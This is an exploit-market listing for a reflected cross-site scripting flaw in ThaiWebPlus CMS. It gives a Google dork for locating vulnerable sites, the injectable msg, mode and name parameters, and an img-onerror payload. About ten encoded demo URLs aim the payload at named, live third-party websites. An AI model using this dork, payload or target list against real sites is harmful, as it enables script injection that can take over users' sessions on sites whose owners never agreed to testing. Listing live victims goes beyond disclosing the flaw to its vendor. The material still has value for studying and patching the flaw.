[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ThaiWebPlus CMS Cross Site Scripting Vulnerability

Author
Mojtaba MobhaM
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-24704
Category
web applications
Date add
10-12-2015
Platform
php
######################
# Exploit Title : ThaiWebPlus CMS Cross Site Scripting Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://thaiwebplus.com
# Google Dork : Powered by ThaiWebPlus inurl:id_run=
# Date : 2015/12/12
# Version : 1.0
#
######################
# 1-1:Admin Page msg= Paramter
# 
# Demo :
#
#http://www.popman-popcorn.com/_adminP/login.php?msg=password%20incorrect%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#http://www.tourpakse.com/_adminP/login.php?msg=password%20incorrect%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#http://www.pptraining.in.th/_adminP/login.php?msg=password%20incorrect%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#
# 1-2:Vulnerable Paramter mode= And name=
#
# Poc: 
# url: /index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode='><img onerror=alert(1) src="asd">&name=
# http://target/url
#
# Demo : 
#
#http://www.88part.com/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#http://www.laostai.com/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#http://www.tourpakse.com/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#http://www.chokdeepremium.com/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#http://www.thairctoy.com/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#http://www.pptraining.in.th/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Home : http://www.persian-team.ir/
######################

#  0day.today [2024-09-28]  #